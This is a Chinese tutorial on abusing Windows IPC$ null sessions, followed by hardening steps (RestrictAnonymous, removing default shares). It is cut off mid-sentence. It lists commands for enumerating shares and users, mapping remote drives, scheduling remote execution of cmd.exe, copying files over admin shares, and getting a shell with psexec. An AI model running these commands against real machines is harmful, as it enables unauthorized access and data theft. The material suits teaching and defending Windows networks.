空连接的利用.docxVIP

空连接（IPC$）简介： ipc$即空连接。 使用命令 net use url=file://\\IP\ipc$\\IP\ipc$ /user: 就可以简单地和目标建立一个空连接（需要目标开放ipc$）。 IPC$(Internet Process Connection) 是共享 命名管道 的资源，它是为了让进程间通信而开放的命名管道，通过提供可信任的用户名和口令，连接双方可以建立安全的通道并以此通道进行加密数据的交换，从而实现对远程计算机的访问。 IPC$ 是 NT/2000 的一项新功能，它有一个特点，即在同一时间内，两个 IP 之间只允许建立一个连接。 NT/2000 在提供了 ipc$ 功能的同时，在初次安装系统时还打开了默认共享，即所有的逻辑共享 (c$,d$,e$ …… ) 和系统目录 winnt 或 windows(admin$) 共享。所有的这些，微软的初衷都是为了方便管理员的管理，但在有意无意中，导致了系统安全性的降低。 空连接的利用 1 首先，对目标主机建立一个空会话（当然，这需要目标开放 ipc$ ） 命令： net use\\ip\ipc$ 注：可能有些空连接是需要本地用户的认证的，命令如下： net use\\ip\ipc$ /user:username password 例： 2 查看远程主机的共享资源 命令： net view\\ip 3 映射远程共享 : net use z:\\10.0.0.6\haha 此命令将共享名为 haha 的共享资源映射为本地 z 盘 映射成功： 注：必须有权限才可以进行映射，例子中是因为目标主机E盘设置了共享，且everyone拥有一定的权限，所以才能映射成功。如果是需要系统用户权限才能访问的话，就必须在第一步建立空连接的时候使用用户名和密码认证。 目标主机E盘的共享权限： 4 得到远程主机的 NetBIOS 用户名列表 命令： nbtstat -A ip 用此命令可以得到一个远程主机的 NetBIOS 用户名列表，返回如下结果： 其他的一些常见的利用： 查看远程主机的当前时间 命令： net time \\ip 解释：用此命令可以得到一个远程主机的当前时间。 2删除连接 : net use \\ip\ipc$ /del 3添加任务计划： at \\10.0.0.6 14:40 c:\cmd.exe 意思是在14:40分的时候执行c盘下的cmd.exe程序 查看目标主机任务计划，显示添加成功： 注意：时间尽量使用 24 小时制；如果你打算运行的程序在系统默认搜索路径（比如 system32/ ）下则不用加路径，否则必须加全路径 4向远程主机复制文件 : copy路径\ 文件名\\IP\共享目录名，如： copy c:\cmd.exe  HYPERLINK \\\\10.0.0.6\\c$ \\10.0.0.6\c$ 即将 c 盘下的 cmd.exe 复制到对方 c 盘内 查看确实传输了cmd.exe到目标主机c盘下： 当然，你也可以把远程主机上的文件复制到自己的机器里： Copy \\10.0.0.6\c$\msizap.exe c:\ 查看自己主机，发现传输成功： 利用psexec.exe 直接获得shell： 防范入侵 1 禁止空连接进行枚举 ( 此操作并不能阻止空连接的建立 ) 运行 regedit ，找到如下主键 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA] 把 RestrictAnonymous = DWORD 的键值改为： 1 如果设置为 1 ，一个匿名用户仍然可以连接到 IPC$ 共享，但无法通过这种连接得到列举 SAM 帐号和共享信息的权限；在 Windows 2000 中增加了 2 ，未取得匿名权的用户将不能进行 ipc$ 空连接。建议设置为 1 。如果上面所说的主键不存在，就新建一个再改键值。如果你觉得改注册表麻烦，可以在本地安全设置中设置此项： 在本地安全设置－本地策略－安全选项－ 对匿名连接的额外限制 2 禁止默认共享 1 ）察看本地共享资源 运行 -cmd- 输入 net share 2 ）删除共享（重起后默认共享仍然存在） net share ipc$ /delete net share admin$ /delete net share c$ /delete net share d$ /delete （如果有 e,f, ……可以继续删除） 3 ）停止 server 服务 net stop server /y （重新启动后 server 服务会重新开启） 4 ）禁止自动打开默认共享（此操作并不能关闭 ipc$ 共享） 运行 -regedit se